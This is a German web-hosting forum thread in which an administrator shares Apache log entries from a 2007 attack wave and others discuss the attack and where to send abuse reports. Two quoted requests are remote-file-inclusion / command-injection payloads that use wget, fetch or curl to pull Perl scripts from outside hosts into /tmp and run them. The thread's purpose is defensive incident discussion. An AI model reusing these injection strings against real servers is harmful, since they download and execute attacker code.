Angriff auf Server

[Mordor]

Mahlzeit allerseits!
Das man hin und wieder mal in den Logfiles komische Sachen finde ist ja normal. Ich hatte Gestern Mittag aber über 800 Http Anfragen mit voranngehenden mehrfachen Portscanns.
Für mich sieht das aus wie Crosssidescriptingversuche:

64.40.110.192 - - [22/Mar/2007:13:24:24 +0100] "GET /window.php?action=http://smurf.deep-ice.com/kid.gif?&cmd=wget%20-P%20/tmp%20http://193.94.169.61/WebCalendar/tools/a.pl;perl%20/tmp/a.pl;fetch%20-o%20/var/tmp%20http://193.94.169.61/WebCalendar/tools/a.pl;perl%20/tmp/a.pl;curl%20-o%20/tmp/a.pl%20-O%20http://193.94.169.61/WebCalendar/tools/a.pl;perl%20/tmp/a.pl;rm%20-rf%20/tmp/a.pl;echo/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner"

Das ist zum Beispiel eine davon.

Sonst konnte ich nichts in den Logs finden. Auch die Seite läuft einwandfrei. Anscheinend ist der Angriff nicht ganz geglückt.

die Hauptfrage die sich mir stellt ist, ab wann kann man bedenkenlos eine Abuse-Mail schreiben, ohne dass man sich lächerlich macht. Sind 600 bis 800 Anfragen dieser Art schon gerechtvertigt?

Gruß Mordor

 

[blupp1]

ich denk mal dies ist hier ein skript kiddie, sowas hatte ich auch mal! das wars doch oder?

 

[Mercenary]

Hier
Yaay » How to protect against “Morfeus fucking scanner”
hat sich wohl jemand schon eingehender damit befasst.

Ciao,
Mercy.

 

[Guin]

Vielleicht ist der Thread noch von Interesse

Besuch von Sclipici / Sclico ?

In letzter Zeit haeuft sich folgender Request: /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://xargonu.evonet.ro/tool25.txt?&cmd=curl%20-o%20/tmp/unix%20http://www.rebegea.as.ro/scan.pl;perl%20/tmp/unix (scheinbar eine Mambo Schwachstelle)...

serversupportforum.de

 

[V40]

Hallo,

solange ein 404 dabei raus kommt ist das nur lästig.

Also bei dem oben genannten Beispiel gibt es keinen Grund zur Sorge.

Edit:
Abuse nicht vergessen
Report Abuse. FateBack Linux free web hosting and paid web hosting network.
Das ist das Abuse Formular von dem Free-Hoster auf dem das schädliche Script liegt.

 

[Mordor]

Sorgen mach ich mir da nicht, denn wie gesagt, es gab ja nur 404s.

@v40
Wie bist du an das Formular gekommen?
Ich hab zwar schon ne whois Abfrage über DNSstuff laufen lassen, und da bin ich nur an die aubse E-mailadresse des Providers gekommen.

Gruß Mordor

 

[V40]

Hallo,

....http://smurf.deep-ice.com.....

Das ist eine Subdomain eines Feehosters.
Ruf einfach mal deep-ice.com auf, da findest du dann oben Rechts die Kontaktmöglichkeiten.

 

[Mordor]

Super, ich sag mal danke.
Werd mich dann mal dran machen, mein abuse zu schreiben.

Gruß Mordor

 

[Mordor]

So, mir ist grad aufgefallen, dass der Feehoster und der Server von dem die Anfragen kamen unterschiedliche IPs hatten. zumindest sagt das whois Abfrage. Werd mal beiden ein Abuse schreiben.
Bin mal gespannt was da zurück kommt.

 

[V40]

Hallo,

deswegen schrieb ich ja auch das du an den wo das schädliche Script sich befindet eine Abuse Mail schreiben solltest.

Das der Angriffs-Versuch von anderer Seite kam (DSL Anschluss) ist eigentlich klar.

Bei dem Freehoster liegt nur das Script das versucht wurde auf deinen Server zu laden.

 

[Mordor]

Wie gesagt, ich bin ja mal gespannt was da kommt.
Wenn man das Formular vom Freehoster abschickt kriegt man ne Bestätigung, dass die sich in 24 Stunden spätestens mit einem in Verbindung setzen.
Bin mal gespannt ob das auch am Sonntag klappt.

 

[Breitling]

Für mich sieht das aus wie Crosssidescriptingversuche

css ist was anderes, siehr eher nach code injection aus...